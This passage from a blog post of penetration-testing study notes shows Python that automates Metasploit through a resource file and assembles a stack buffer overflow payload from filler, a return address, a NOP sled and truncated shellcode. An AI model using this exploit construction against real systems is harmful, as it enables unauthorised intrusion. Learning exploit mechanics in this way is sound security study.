        <span class="n">config_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="s">"exploit -j -z</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="整合">Putting It All Together</h3>

<p>The key question is how the main function talks to Metasploit. It turns out to be through the rc file.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">config_file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">"meta.rc"</span><span class="p">,</span> <span class="s">"w"</span><span class="p">)</span>
<span class="p">...</span>
<span class="n">os</span><span class="p">.</span><span class="n">system</span><span class="p">(</span><span class="s">"msfconsole -r meta.rc"</span><span class="p">)</span>
</code></pre></div></div>
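
<p>One detail the fragment above does not show is closing <code class="language-plaintext highlighter-rouge">meta.rc</code> before <code class="language-plaintext highlighter-rouge">msfconsole</code> reads it; buffered writes may otherwise not be on disk yet. A minimal sketch of that hand-off follows. The helper names <code class="language-plaintext highlighter-rouge">write_rc</code> and <code class="language-plaintext highlighter-rouge">msfconsole_command</code> are hypothetical, the two console commands are harmless placeholders, and the command line is only built, not executed.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import os
import tempfile


def write_rc(path, commands):
    """Write one console command per line to a resource script."""
    with open(path, "w") as rc_file:
        for command in commands:
            rc_file.write(command + "\n")
    # Leaving the with-block closes the file, so every line is flushed to disk


def msfconsole_command(path):
    """Return the argument list that would load the script (not run here)."""
    return ["msfconsole", "-r", path]


# Placeholder commands only; a temporary directory keeps the sketch self-contained
rc_path = os.path.join(tempfile.mkdtemp(), "meta.rc")
write_rc(rc_path, ["version", "exit"])
print(msfconsole_command(rc_path))
</code></pre></div></div>

<p>Passing the returned list to <code class="language-plaintext highlighter-rouge">subprocess.run</code> instead of building a string for <code class="language-plaintext highlighter-rouge">os.system</code> would avoid shell quoting problems if the path contains spaces.</p>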

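<h2 id="编写你自己的-0day-概念验证代码">Writing Your Own Zero-Day Proof-of-Concept Code</h2>

<p>The Morris worm succeeded in part because it exploited a stack-based buffer overflow in the Finger service.</p>

<h3 id="基于栈的缓冲区溢出攻击">Stack-Based Buffer Overflow Attacks</h3>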

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">struct</span>

<span class="c1"># Byte strings throughout, so the pieces concatenate with struct.pack() output on Python 3</span>
<span class="n">shellcode</span> <span class="o">=</span> <span class="p">(</span><span class="sa">b</span><span class="s">"</span><span class="se">\xbf\x5c</span><span class="s">...."</span><span class="p">)</span>  <span class="c1"># truncated in these notes</span>
<span class="n">overflow</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x41</span><span class="s">"</span> <span class="o">*</span> <span class="mi">246</span>  <span class="c1"># filler bytes</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"&lt;L"</span><span class="p">,</span> <span class="mh">0x7c874413</span><span class="p">)</span>  <span class="c1"># return address, little-endian</span>
<span class="n">padding</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x90</span><span class="s">"</span> <span class="o">*</span> <span class="mi">150</span>  <span class="c1"># NOP sled</span>
<span class="n">crash</span> <span class="o">=</span> <span class="n">overflow</span> <span class="o">+</span> <span class="n">ret</span> <span class="o">+</span> <span class="n">padding</span> <span class="o">+</span> <span class="n">shellcode</span>
</code></pre></div></div>
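
<p>To make the layout of that buffer easier to see, here is a minimal sketch that assumes Python 3 byte strings. The real shellcode is replaced by a harmless placeholder, and <code class="language-plaintext highlighter-rouge">build_buffer</code>, <code class="language-plaintext highlighter-rouge">FILL_LEN</code>, <code class="language-plaintext highlighter-rouge">NOP_LEN</code> and <code class="language-plaintext highlighter-rouge">PLACEHOLDER</code> are hypothetical names introduced only for illustration. It swaps in <code class="language-plaintext highlighter-rouge">int.to_bytes(4, "little")</code>, which should yield the same four bytes as the little-endian <code class="language-plaintext highlighter-rouge">struct.pack</code> call for an unsigned 32-bit value.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FILL_LEN = 246  # filler length taken from the snippet above
NOP_LEN = 150   # NOP-sled length taken from the snippet above
PLACEHOLDER = b"\xcc" * 4  # stand-in bytes, not real shellcode


def build_buffer(ret_addr, payload=PLACEHOLDER):
    """Concatenate filler, return address, NOP sled and payload."""
    overflow = b"\x41" * FILL_LEN
    ret = ret_addr.to_bytes(4, "little")  # least significant byte first
    padding = b"\x90" * NOP_LEN
    return overflow + ret + padding + payload


buf = build_buffer(0x7c874413)
print(buf[FILL_LEN:FILL_LEN + 4].hex())  # prints 1344877c
print(len(buf))                          # prints 404
</code></pre></div></div>

<p>The address bytes appear reversed in the buffer because x86 stores multi-byte integers least significant byte first.</p>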

<h3 id="发送漏洞利用代码">Sending the Exploit</h3>

<p>The exploit is sent with the <code class="language-plaintext highlighter-rouge">Berkeley Socket API</code>, which is just an ordinary socket send. I already covered this in a university course, so I am not recording it here.</p>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="cybersecurity" /><category term="penetration testing" /><summary type="html"><![CDATA[用 Python 进行渗透测试]]></summary></entry></feed>